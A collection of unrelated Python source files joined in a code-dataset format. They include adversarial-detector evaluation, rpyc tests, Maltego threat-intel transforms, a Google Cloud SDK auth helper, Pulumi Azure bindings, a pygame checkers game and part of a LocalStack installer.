detector = detector.cuda()
detector.eval()
logging.info(detector)
# test_data
test_data = LoadDataset(
args.dataset, args.data_path, train=False, download=False,
resize_size=args.img_size, hdf5_path=None, random_flip=False,
norm=False)
test_loader = DataLoader(
test_data, batch_size=args.batch_size, shuffle=False, num_workers=4,
pin_memory=True)
# start detect
thrs = detector.get_thrs(test_loader, drop_rate=args.drop_rate)
detector.thresh = thrs
total, fp = 0, 0
fp_tn, total_pass_cor, total_rej_wrong = 0, 0, 0
for img, classId in test_loader:
all_pass, _ = detector.detect(img, args.batch_size)
# here we expect data in range [0, 1]
y_pred = detector.classify_normal(img, args.batch_size)
cls_cor = (y_pred == classId)
# FPR
fp += torch.logical_and(cls_cor, all_pass == 0).sum().item()
fp_tn += cls_cor.sum().item()
# robust acc
total += img.shape[0]
total_rej_wrong += torch.logical_and(
cls_cor == 0, all_pass == 0).sum().item()
total_pass_cor += torch.logical_and(
cls_cor == 1, all_pass).sum().item()
print(total_pass_cor, total_rej_wrong, fp, fp_tn, total)
# FPR
logging.info("FPR: (rej & cor) / cor = {}".format(fp / fp_tn))
# robust acc
logging.info("clean acc: (pass & cor + rej & wrong) / all = {}".format(
(total_pass_cor + total_rej_wrong) / total))
test_whitebox(args, args.ae_path, detector)
|
py | 1a4f9a1bb758d86fcf41a52e408246e2079f82f2 | from .concat_vec_env import ConcatVecEnv
from .multiproc_vec import ProcConcatVec
class call_wrap:
def __init__(self, fn, data):
self.fn = fn
self.data = data
def __call__(self, *args):
return self.fn(self.data)
def MakeCPUAsyncConstructor(max_num_cpus):
if max_num_cpus == 0:
return ConcatVecEnv
else:
def constructor(env_fn_list, obs_space, act_space):
example_env = env_fn_list[0]()
envs_per_env = getattr(example_env, "num_envs", 1)
num_fns = len(env_fn_list)
envs_per_cpu = (num_fns + max_num_cpus - 1) // max_num_cpus
alloced_num_cpus = (num_fns + envs_per_cpu - 1) // envs_per_cpu
env_cpu_div = []
num_envs_alloced = 0
while num_envs_alloced < num_fns:
start_idx = num_envs_alloced
end_idx = min(num_fns, start_idx + envs_per_cpu)
env_cpu_div.append(env_fn_list[start_idx:end_idx])
num_envs_alloced = end_idx
assert alloced_num_cpus == len(env_cpu_div)
cat_env_fns = [call_wrap(ConcatVecEnv, env_fns) for env_fns in env_cpu_div]
return ProcConcatVec(cat_env_fns, obs_space, act_space, num_fns * envs_per_env)
return constructor
|
py | 1a4f9a869353056b5fb251fdd47e611fe29d5d9b | import time
import unittest
import rpyc
class TestAsync(unittest.TestCase):
def setUp(self):
self.conn = rpyc.classic.connect_thread()
self.a_sleep = rpyc.async(self.conn.modules.time.sleep)
self.a_int = rpyc.async(self.conn.builtin.int)
def tearDown(self):
self.conn.close()
def test_asyncresult_api(self):
res = self.a_sleep(2)
self.assertFalse(res.ready)
res.wait()
self.assertTrue(res.ready)
self.assertFalse(res.expired)
self.assertFalse(res.error)
self.assertEqual(res.value, None)
def test_asyncresult_expiry(self):
res = self.a_sleep(5)
res.set_expiry(4)
t0 = time.time()
self.assertRaises(rpyc.AsyncResultTimeout, res.wait)
dt = time.time() - t0
#print( "timed out after %s" % (dt,) )
self.assertTrue(dt >= 3.5, str(dt))
self.assertTrue(dt <= 4.5, str(dt))
def test_asyncresult_callbacks(self):
res = self.a_sleep(2)
visited = []
def f(res):
assert res.ready
assert not res.error
visited.append("f")
def g(res):
visited.append("g")
res.add_callback(f)
res.add_callback(g)
res.wait()
self.assertEqual(set(visited), set(["f", "g"]))
def test_timed(self):
timed_sleep = rpyc.timed(self.conn.modules.time.sleep, 5)
res = timed_sleep(3)
res.value
res = timed_sleep(7)
self.assertRaises(rpyc.AsyncResultTimeout, lambda: res.value)
def test_exceptions(self):
res = self.a_int("foo")
res.wait()
self.assertTrue(res.error)
self.assertRaises(ValueError, lambda: res.value)
if __name__ == "__main__":
unittest.main()
|
py | 1a4f9b4268b8dbdeecb8b4aac7c81dea38c9b733 | # Generated by Django 3.2.1 on 2021-05-07 18:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='email',
field=models.EmailField(max_length=254, unique=True),
),
]
|
py | 1a4f9b7b2507f631010c37b252883acd413af2f3 | import sys
from helpers import api_qradio as q
from helpers import MaltegoTransform
##############################################################
## ENRICH Section
def ipv4_enrich(mt, ip_address):
enrich_list = q.ipv4_enrich(ip_address)
for domain in enrich_list['domains']:
mt.addEntity("maltego.Domain", domain)
for hash in enrich_list['hash']:
mt.addEntity("maltego.Hash", hash)
for score in enrich_list['score']:
mt.addEntity("maltego.Score", score)
mt.addEntity("maltego.Blacklist", str(enrich_list['blacklist']))
return mt
def domain_enrich(mt, domain_name):
enrich_list = q.domain_enrich(domain_name)
for ip_address in enrich_list['ip_address']:
mt.addEntity("maltego.IPv4Address", ip_address)
for hash in enrich_list['hash']:
mt.addEntity("maltego.Hash", hash)
for score in enrich_list['score']:
mt.addEntity("maltego.Score", score)
return mt
def hash_enrich(mt, hash_value):
enrich_list = q.hash_enrich(hash_value)
for score in enrich_list:
mt.addEntity("maltego.Score", score['score'])
for ip_address in enrich_list:
mt.addEntity("maltego.IPv4Address", ip_address['ip_address'])
for imphash in enrich_list:
mt.addEntity("maltego.Imphash", imphash['imphash'])
for uri in enrich_list:
mt.addEntity("maltego.URI", uri['uri'])
return mt
##############################################################
## IP section
def ipv4_to_domain(mt, ip_address):
domain_list = q.ipv4_to_domain(ip_address)
for domain in domain_list:
mt.addEntity("maltego.Domain", domain)
return mt
def ipv4_to_hash(mt, ip_address):
hash_list = q.ipv4_to_hash(ip_address)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
def ipv4_to_blacklist(mt, ip_address):
blacklisted = q.ipv4_to_blacklist(ip_address)
mt.addEntity("maltego.Blacklist", blacklisted)
return mt
def ipv4_to_score(mt, ip_address):
score_list = q.ipv4_to_score(ip_address)
for score in score_list:
mt.addEntity("maltego.Score", score)
return mt
##############################################################
## Domain section
def domain_to_ipv4(mt, domain_name):
ip_list = q.domain_to_ipv4(domain_name)
for ip_address in ip_list:
mt.addEntity("maltego.IPv4Address", ip_address)
return mt
def domain_to_hash(mt, domain_name):
hash_list = q.domain_to_hash(domain_name)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
def domain_to_score(mt, domain_name):
score_list = q.domain_to_score(domain_name)
for score in score_list:
mt.addEntity("maltego.Score", score)
return mt
##############################################################
## Hash section
def hash_to_score(mt, hash_valuse):
score_list = q.hash_to_score(hash_valuse)
for score in score_list:
mt.addEntity("maltego.Score", score)
return mt
def hash_to_imphash(mt, hash_valuse):
imphash_list = q.hash_to_imphash(hash_valuse)
for imphash in imphash_list:
mt.addEntity("maltego.Imphash", imphash)
return mt
def hash_to_ipv4(mt, hash_valuse):
ip_list = q.hash_to_ipv4(hash_valuse)
for ip_address in ip_list:
mt.addEntity("maltego.IPv4Address", ip_address)
return mt
def hash_to_uri(mt, hash_valuse):
uri_list = q.hash_to_uri(hash_valuse)
for uri in uri_list:
mt.addEntity("maltego.URI", uri)
return mt
##############################################################
## Imphash section
def imphash_to_hash(mt, imphash):
hash_list = q.imphash_to_hash(imphash)
for hash in hash_list:
mt.addEntity("maltego.Hash", hash)
return mt
##############################################################
functions = {
'ipv4_enrich': ipv4_enrich,
'domain_enrich': domain_enrich,
'hash_enrich': hash_enrich,
'ipv4_to_domain': ipv4_to_domain,
'ipv4_to_hash': ipv4_to_hash,
'ipv4_to_blacklist': ipv4_to_blacklist,
'ipv4_to_score': ipv4_to_score,
'domain_to_ipv4': domain_to_ipv4,
'domain_to_hash': domain_to_hash,
'domain_to_score': domain_to_score,
'hash_to_score': hash_to_score,
'hash_to_imphash': hash_to_imphash,
'hash_to_ipv4': hash_to_ipv4,
'hash_to_uri': hash_to_uri,
'imphash_to_hash': imphash_to_hash,
}
##### MAIN #####
if __name__ == '__main__':
transform = sys.argv[1]
data = sys.argv[2]
mt = MaltegoTransform()
result = functions[transform](mt, data)
result.returnOutput() |
py | 1a4f9c4a8b1293482860865a9ff356b0c571ede5 |
class Node():
def __init__(self, alphabet):
self.char = alphabet
self.children = []
self.end_of_word = False
self.counter = 1
'''
Create a tree of alphabets like this:
+
/ \
c d
/ \
a o
/ \ \
t p g
'''
class Trie():
def __init__(self):
self.root = Node('+')
def addWord(self, word):
node = self.root
for letter in word:
found_flag = False
for child in node.children:
if child.char == letter:
child.counter += 1
node = child
found_flag = True
break
if not found_flag:
newChild = Node(letter)
node.children.append(newChild)
node = newChild
node.end_of_word = True
def findWord(self, word):
node = self.root
for letter in word:
found_flag = False
for child in node.children:
if child.char == letter:
node = child
found_flag = True
break
return found_flag and node.end_of_word
def delWord(self, word):
node = self.root
if(not self.findWord(word)):
print("Word not found")
return
for letter in word:
for child in node.children:
if child.char == letter:
if child.counter == 1:
node.children.remove(child)
return
else:
node = child
break
#In the case we want to delete 'dog' but keep 'dogs'
if letter == node.char:
node.end_of_word = False
return
print("Word not found")
return
def discover(self, node, prefix):
words = []
for child in node.children:
if child.end_of_word:
words.append(prefix + child.char)
if child.children:
words.extend(self.discover(child, prefix + child.char))
else:
words.extend(self.discover(child, prefix + child.char))
return words
def wordsWithPrefix(self, prefix):
node = self.root
found_flag = False
for letter in prefix:
found_flag = False
for child in node.children:
if letter == child.char:
node = child
found_flag = True
break
if not found_flag:
return []
return self.discover(node, prefix)
def allWords(self):
node = self.root
return self.discover(node, "")
|
py | 1a4f9c56709069ce5bcf8a7a39563ba80269abb0 | from YTR import app
# Python imports
import subprocess
import json
import os
def open_browser():
# open config.JSON as r+
config = open("config.JSON", "r+")
my_config = json.load(config)
if my_config['OS'] == 'Linux':
subprocess.run("sensible-browser 127.0.0.1:5100", shell=True)
elif my_config['OS'] == 'OSX':
subprocess.run("open 127.0.0.1:5100", shell=True)
# open_browser()
if __name__ == '__main__':
app.run(debug=True, port=5100)
|
py | 1a4f9d7fada50d89819a0f9bbefdbf175bbee4c9 | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
# from flask_script import Manager
from flask_migrate import Migrate #, MigrateCommand
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///storage.db'
db = SQLAlchemy(app)
migrate = Migrate(app, db)
#manager = Manager(app)
#manager.add_command('db', MigrateCommand)
from app.controllers import default
|
py | 1a4f9ed669a9e539dc0dc9f4c72c271f488dc06a | # -*- coding: utf-8 -*- #
# Copyright 2016 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library to support auth commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import json
from googlecloudsdk.core import context_aware
from googlecloudsdk.core import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import yaml
from googlecloudsdk.core.credentials import flow as c_flow
from googlecloudsdk.core.credentials import google_auth_credentials as c_google_auth
from googlecloudsdk.core.util import files
# Client ID from project "usable-auth-library", configured for
# general purpose API testing
# pylint: disable=g-line-too-long
DEFAULT_CREDENTIALS_DEFAULT_CLIENT_ID = '764086051850-6qr4p6gpi6hn506pt8ejuq83di341hur.apps.googleusercontent.com'
DEFAULT_CREDENTIALS_DEFAULT_CLIENT_SECRET = 'd-FL95Q19q7MQmFpd7hHD0Ty'
CLOUD_PLATFORM_SCOPE = 'https://www.googleapis.com/auth/cloud-platform'
GOOGLE_DRIVE_SCOPE = 'https://www.googleapis.com/auth/drive'
USER_EMAIL_SCOPE = 'https://www.googleapis.com/auth/userinfo.email'
OPENID = 'openid'
DEFAULT_SCOPES = [
OPENID,
USER_EMAIL_SCOPE,
CLOUD_PLATFORM_SCOPE
]
CLIENT_SECRET_INSTALLED_TYPE = 'installed'
class Error(exceptions.Error):
"""A base exception for this class."""
pass
class InvalidClientSecretsError(Error):
"""An error for when we fail to load the client secrets file."""
pass
class BadCredentialFileException(Error):
"""Raised when credentials file cannot be read."""
pass
def GetCredentialsConfigFromFile(filename):
"""Returns the JSON content of a credentials config file.
This function is useful when the content of a file need to be inspected first
before determining how to handle it (how to initialize the underlying
credentials). Only UTF-8 JSON files are supported.
Args:
filename (str): The filepath to the ADC file representing credentials.
Returns:
Optional(Mapping): The JSON content.
Raises:
BadCredentialFileException: If JSON parsing of the file fails.
"""
try:
# YAML is a superset of JSON.
content = yaml.load_path(filename)
except UnicodeDecodeError as e:
raise BadCredentialFileException(
'File {0} is not utf-8 encoded: {1}'.format(filename, e))
except yaml.YAMLParseError as e:
raise BadCredentialFileException('Could not read json file {0}: {1}'.format(
filename, e))
# Require the JSON content to be an object.
# Credentials and configs are always objects.
if not isinstance(content, dict):
raise BadCredentialFileException(
'Could not read json file {0}'.format(filename))
return content
def DoInstalledAppBrowserFlowGoogleAuth(launch_browser,
scopes,
client_id_file=None):
"""Launches a 3LO oauth2 flow to get google-auth credentials.
Args:
launch_browser: bool, True to launch the browser, false to ask users to copy
the auth url to a browser.
scopes: [str], The list of scopes to authorize.
client_id_file: str, The path to a file containing the client id and secret
to use for the flow. If None, the default client id for the Cloud SDK is
used.
Returns:
google.auth.credentials.Credentials, The credentials obtained from the flow.
"""
if client_id_file:
AssertClientSecretIsInstalledType(client_id_file)
google_auth_flow = c_flow.CreateGoogleAuthFlow(scopes, client_id_file)
try:
user_creds = c_flow.RunGoogleAuthFlow(google_auth_flow, launch_browser)
return c_google_auth.Credentials.FromGoogleAuthUserCredentials(
user_creds)
except c_flow.Error as e:
if context_aware.IsContextAwareAccessDeniedError(e):
msg = context_aware.CONTEXT_AWARE_ACCESS_HELP_MSG
else:
msg = 'There was a problem with web authentication.'
if launch_browser:
msg += ' Try running again with --no-launch-browser.'
log.error(msg)
raise
def GetClientSecretsType(client_id_file):
"""Get the type of the client secrets file (web or installed)."""
invalid_file_format_msg = (
'Invalid file format. See '
'https://developers.google.com/api-client-library/'
'python/guide/aaa_client_secrets')
try:
obj = json.loads(files.ReadFileContents(client_id_file))
except files.Error:
raise InvalidClientSecretsError(
'Cannot read file: "%s"' % client_id_file)
if obj is None:
raise InvalidClientSecretsError(invalid_file_format_msg)
if len(obj) != 1:
raise InvalidClientSecretsError(
invalid_file_format_msg + ' '
'Expected a JSON object with a single property for a "web" or '
'"installed" application')
return tuple(obj)[0]
def AssertClientSecretIsInstalledType(client_id_file):
client_type = GetClientSecretsType(client_id_file)
if client_type != CLIENT_SECRET_INSTALLED_TYPE:
raise InvalidClientSecretsError(
'Only client IDs of type \'%s\' are allowed, but encountered '
'type \'%s\'' % (CLIENT_SECRET_INSTALLED_TYPE, client_type))
|
py | 1a4f9f88d1826898c1fa450b83a4cf2d261a9343 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetNetworkSecurityGroupResult',
'AwaitableGetNetworkSecurityGroupResult',
'get_network_security_group',
]
@pulumi.output_type
class GetNetworkSecurityGroupResult:
"""
NetworkSecurityGroup resource.
"""
def __init__(__self__, default_security_rules=None, etag=None, id=None, location=None, name=None, network_interfaces=None, provisioning_state=None, resource_guid=None, security_rules=None, subnets=None, tags=None, type=None):
if default_security_rules and not isinstance(default_security_rules, list):
raise TypeError("Expected argument 'default_security_rules' to be a list")
pulumi.set(__self__, "default_security_rules", default_security_rules)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if network_interfaces and not isinstance(network_interfaces, list):
raise TypeError("Expected argument 'network_interfaces' to be a list")
pulumi.set(__self__, "network_interfaces", network_interfaces)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if resource_guid and not isinstance(resource_guid, str):
raise TypeError("Expected argument 'resource_guid' to be a str")
pulumi.set(__self__, "resource_guid", resource_guid)
if security_rules and not isinstance(security_rules, list):
raise TypeError("Expected argument 'security_rules' to be a list")
pulumi.set(__self__, "security_rules", security_rules)
if subnets and not isinstance(subnets, list):
raise TypeError("Expected argument 'subnets' to be a list")
pulumi.set(__self__, "subnets", subnets)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="defaultSecurityRules")
def default_security_rules(self) -> Optional[Sequence['outputs.SecurityRuleResponse']]:
"""
The default security rules of network security group.
"""
return pulumi.get(self, "default_security_rules")
@property
@pulumi.getter
def etag(self) -> Optional[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkInterfaces")
def network_interfaces(self) -> Sequence['outputs.NetworkInterfaceResponse']:
"""
A collection of references to network interfaces.
"""
return pulumi.get(self, "network_interfaces")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> Optional[str]:
"""
The provisioning state of the public IP resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> Optional[str]:
"""
The resource GUID property of the network security group resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter(name="securityRules")
def security_rules(self) -> Optional[Sequence['outputs.SecurityRuleResponse']]:
"""
A collection of security rules of the network security group.
"""
return pulumi.get(self, "security_rules")
@property
@pulumi.getter
def subnets(self) -> Sequence['outputs.SubnetResponse']:
"""
A collection of references to subnets.
"""
return pulumi.get(self, "subnets")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetNetworkSecurityGroupResult(GetNetworkSecurityGroupResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetNetworkSecurityGroupResult(
default_security_rules=self.default_security_rules,
etag=self.etag,
id=self.id,
location=self.location,
name=self.name,
network_interfaces=self.network_interfaces,
provisioning_state=self.provisioning_state,
resource_guid=self.resource_guid,
security_rules=self.security_rules,
subnets=self.subnets,
tags=self.tags,
type=self.type)
def get_network_security_group(expand: Optional[str] = None,
network_security_group_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetNetworkSecurityGroupResult:
"""
NetworkSecurityGroup resource.
:param str expand: Expands referenced resources.
:param str network_security_group_name: The name of the network security group.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['expand'] = expand
__args__['networkSecurityGroupName'] = network_security_group_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network/v20180401:getNetworkSecurityGroup', __args__, opts=opts, typ=GetNetworkSecurityGroupResult).value
return AwaitableGetNetworkSecurityGroupResult(
default_security_rules=__ret__.default_security_rules,
etag=__ret__.etag,
id=__ret__.id,
location=__ret__.location,
name=__ret__.name,
network_interfaces=__ret__.network_interfaces,
provisioning_state=__ret__.provisioning_state,
resource_guid=__ret__.resource_guid,
security_rules=__ret__.security_rules,
subnets=__ret__.subnets,
tags=__ret__.tags,
type=__ret__.type)
|
py | 1a4f9fa48965d8711f6e006d82a3d3395b205570 | import uuid
import numpy as np
class Detection():
"""Detection Result"""
def __init__(self, box, score):
"""
Args:
box: bounding box as [x, y, w, h]
score: detection confidence in [0, 1]
"""
self.box = np.asarray(box, dtype=np.float)
self.score = score
def to_array(self):
return np.append(self.box, self.score)
def get_box_xyxy(self):
box = self.box.copy()
box[2:] += box[:2]
return box
def to_array_xyxy(self):
return np.append(self.get_box_xyxy(), self.score)
class Track():
""" Single target tracking """
NEW = 0
ACTIVE = 1
FINISHED = 2
def __init__(self, det, track_id=None):
"""
Returns a single target tracker.
Args:
det: Detection result object
track_id: unique track id. Assigns random 6 digit hex string if None. Default=None.
"""
self.box = det.get_box_xyxy()
self.score = det.score
self.status = Track.NEW
self.track_id = track_id if track_id is not None else uuid.uuid4().hex[:6]
self.frames = 1
self.status = Track.NEW
def __str__(self):
"""print str"""
return "%s" % self.to_dict()
def to_dict(self):
"""Returns dict representation"""
return {
'track_id': self.track_id,
'box': self.box,
'score': self.score,
'status': self.status,
'frames': self.frames
}
def update(self, det):
"""Update tracker.
Args:
det: Detection result object
"""
self.box = det.get_box_xyxy()
self.score = det.score
self.frames += 1
def active(self):
"""Set status to active"""
self.status = Track.ACTIVE
def finish(self):
"""Set status to finished; can be marked for deletion"""
self.status = Track.FINISHED
def is_finished(self):
return self.status == Track.FINISHED
class Tracker():
""" Multi-target tracker """
def __init__(self):
self.tracks = []
def track(self, detections):
return NotImplementedError
def get_tracks(self):
"""Returns new or active tacks"""
tracks = [track for track in self.tracks if not track.is_finished()]
tracks = np.asarray(tracks)
return tracks
|
py | 1a4fa0082308945a86cdc1acf6337e097b281ff6 | import pygame
from .board import Board
from .config import RED, WHITE, BLUE, BLACK, SQUARE_SIZE
class Game():
def __init__(self, win):
self.win = win
self._init()
def _init(self):
self.selected_piece = None
self.board = Board()
self.turn = RED
self.valid_moves = {}
def update(self):
self.board.draw(self.win)
self.draw_valid_moves(self.valid_moves)
pygame.display.update()
def reset(self):
self._init()
def select(self, row, col):
if self.selected_piece:
result = self._move(row, col)
if not result:
self.selected_piece = None
self.select(row, col)
piece = self.board.get_piece(row, col)
if piece != 0 and piece.color == self.turn:
self.selected_piece = piece
self.valid_moves = self.board.get_valid_moves(piece)
return True
return False
def _move(self, row, col):
piece = self.board.get_piece(row, col)
if self.selected_piece and piece == 0 and (row, col) in self.valid_moves:
self.board.move(self.selected_piece, row, col)
skipped = self.valid_moves[(row, col)]
if skipped:
self.board.remove(skipped)
self.change_turn()
return True
return False
def draw_valid_moves(self, moves):
for move in moves:
row, col = move
half_square_size = SQUARE_SIZE // 2
x_pos = col * SQUARE_SIZE + half_square_size
y_pos = row * SQUARE_SIZE + half_square_size
radius = 15
pygame.draw.circle(self.win, BLUE, (x_pos, y_pos), radius)
def change_turn(self):
self.valid_moves = {}
self.turn = BLUE if self.turn == RED else RED
def winner(self):
return self.board.winner(self.turn)
def get_board(self):
return self.board
def ai_move(self, board):
self.board = board
self.change_turn()
|
py | 1a4fa03587578779ec4cb8f06f740418bb97d87e | from .yaml_config_hook import yaml_config_hook
from .save_model import save_model
|
py | 1a4fa1090d9a69583587d10d67181e84c3191779 | #!/usr/bin/env python
import glob
import logging
import os
import platform
import re
import shutil
import sys
import tempfile
import time
import requests
from localstack import config
from localstack.config import KINESIS_PROVIDER
from localstack.constants import (
DEFAULT_SERVICE_PORTS,
DYNAMODB_JAR_URL,
DYNAMODB_JAR_URL_ALPINE,
ELASTICMQ_JAR_URL,
ELASTICSEARCH_DEFAULT_VERSION,
ELASTICSEARCH_DELETE_MODULES,
ELASTICSEARCH_PLUGIN_LIST,
ELASTICSEARCH_URLS,
INSTALL_DIR_INFRA,
KMS_URL_PATTERN,
LOCALSTACK_INFRA_PROCESS,
LOCALSTACK_MAVEN_VERSION,
MODULE_MAIN_PATH,
STS_JAR_URL,
)
from localstack.utils import bootstrap
from localstack.utils.common import is_windows
if __name__ == "__main__":
bootstrap.bootstrap_installation()
# noqa: E402
from localstack.utils.common import (
chmod_r,
download,
get_arch,
in_docker,
is_alpine,
load_file,
mkdir,
new_tmp_file,
parallelize,
rm_rf,
run,
save_file,
untar,
unzip,
)
INSTALL_DIR_NPM = "%s/node_modules" % MODULE_MAIN_PATH
INSTALL_DIR_DDB = "%s/dynamodb" % INSTALL_DIR_INFRA
INSTALL_DIR_KCL = "%s/amazon-kinesis-client" % INSTALL_DIR_INFRA
INSTALL_DIR_STEPFUNCTIONS = "%s/stepfunctions" % INSTALL_DIR_INFRA
INSTALL_DIR_KMS = "%s/kms" % INSTALL_DIR_INFRA
INSTALL_DIR_ELASTICMQ = "%s/elasticmq" % INSTALL_DIR_INFRA
INSTALL_PATH_LOCALSTACK_FAT_JAR = "%s/localstack-utils-fat.jar" % INSTALL_DIR_INFRA
INSTALL_PATH_DDB_JAR = os.path.join(INSTALL_DIR_DDB, "DynamoDBLocal.jar")
INSTALL_PATH_KCL_JAR = os.path.join(INSTALL_DIR_KCL, "aws-java-sdk-sts.jar")
INSTALL_PATH_STEPFUNCTIONS_JAR = os.path.join(INSTALL_DIR_STEPFUNCTIONS, "StepFunctionsLocal.jar")
INSTALL_PATH_KMS_BINARY_PATTERN = os.path.join(INSTALL_DIR_KMS, "local-kms.<arch>.bin")
INSTALL_PATH_ELASTICMQ_JAR = os.path.join(INSTALL_DIR_ELASTICMQ, "elasticmq-server.jar")
INSTALL_PATH_KINESALITE_CLI = os.path.join(INSTALL_DIR_NPM, "kinesalite", "cli.js")
INSTALL_PATH_KINESIS_MOCK = os.path.join(INSTALL_DIR_INFRA, "kinesis-mock")
URL_LOCALSTACK_FAT_JAR = (
"https://repo1.maven.org/maven2/"
+ "cloud/localstack/localstack-utils/{v}/localstack-utils-{v}-fat.jar"
).format(v=LOCALSTACK_MAVEN_VERSION)
MARKER_FILE_LIGHT_VERSION = "%s/.light-version" % INSTALL_DIR_INFRA
IMAGE_NAME_SFN_LOCAL = "amazon/aws-stepfunctions-local"
ARTIFACTS_REPO = "https://github.com/localstack/localstack-artifacts"
SFN_PATCH_CLASS = (
"com/amazonaws/stepfunctions/local/runtime/executors/task/LambdaTaskStateExecutor.class"
)
SFN_PATCH_CLASS_URL = "%s/raw/master/stepfunctions-local-patch/%s" % (
ARTIFACTS_REPO,
SFN_PATCH_CLASS,
)
# kinesis-mock version
KINESIS_MOCK_VERSION = os.environ.get("KINESIS_MOCK_VERSION") or "0.1.3"
KINESIS_MOCK_RELEASE_URL = (
"https://api.github.com/repos/etspaceman/kinesis-mock/releases/tags/" + KINESIS_MOCK_VERSION
)
DEBUGPY_MODULE = "debugpy"
DEBUGPY_DEPENDENCIES = ["gcc", "python3-dev", "musl-dev"]
# Target version for javac, to ensure compatibility with earlier JREs
JAVAC_TARGET_VERSION = "1.8"
# SQS backend implementation provider - either "moto" or "elasticmq"
SQS_BACKEND_IMPL = os.environ.get("SQS_PROVIDER") or "moto"
# TODO: 2019-10-09: Temporarily overwriting DDB, as we're hitting a SIGSEGV JVM crash with the latest version
OVERWRITE_DDB_FILES_IN_DOCKER = False
# set up logger
LOG = logging.getLogger(__name__)
def get_elasticsearch_install_version(version=None):
if config.SKIP_INFRA_DOWNLOADS:
return ELASTICSEARCH_DEFAULT_VERSION
return version or ELASTICSEARCH_DEFAULT_VERSION
def get_elasticsearch_install_dir(version=None):
version = get_elasticsearch_install_version(version)
if version == ELASTICSEARCH_DEFAULT_VERSION and not os.path.exists(MARKER_FILE_LIGHT_VERSION):
# install the default version into a subfolder of the code base
install_dir = os.path.join(INSTALL_DIR_INFRA, "elasticsearch")
else:
install_dir = os.path.join(config.TMP_FOLDER, "elasticsearch", version)
return install_dir
def install_elasticsearch(version=None):
version = get_elasticsearch_install_version(version)
install_dir = get_elasticsearch_install_dir(version)
installed_executable = os.path.join(install_dir, "bin", "elasticsearch")
if not os.path.exists(installed_executable):
log_install_msg("Elasticsearch (%s)" % version)
es_url = ELASTICSEARCH_URLS.get(version)
if not es_url:
raise Exception('Unable to find download URL for Elasticsearch version "%s"' % version)
install_dir_parent = os.path.dirname(install_dir)
mkdir(install_dir_parent)
# download and extract archive
tmp_archive = os.path.join(config.TMP_FOLDER, "localstack.%s" % os.path.basename(es_url))
download_and_extract_with_retry(es_url, tmp_archive, install_dir_parent)
elasticsearch_dir = glob.glob(os.path.join(install_dir_parent, "elasticsearch*"))
if not elasticsearch_dir:
raise Exception("Unable to find Elasticsearch folder in %s" % install_dir_parent)
shutil.move(elasticsearch_dir[0], install_dir)
for dir_name in ("data", "logs", "modules", "plugins", "config/scripts"):
dir_path = os.path.join(install_dir, dir_name)
mkdir(dir_path)
chmod_r(dir_path, 0o777)
# install default plugins
for plugin in ELASTICSEARCH_PLUGIN_LIST:
if is_alpine():
# https://github.com/pires/docker-elasticsearch/issues/56
os.environ["ES_TMPDIR"] = "/tmp"
plugin_binary = os.path.join(install_dir, "bin", "elasticsearch-plugin")
plugin_dir = os.path.join(install_dir, "plugins", plugin)
if not os.path.exists(plugin_dir):
LOG.info("Installing Elasticsearch plugin %s" % (plugin))
run("%s install -b %s" % (plugin_binary, plugin))
# delete some plugins to free up space
for plugin in ELASTICSEARCH_DELETE_MODULES:
module_dir = os.path.join(install_dir, "modules", plugin)
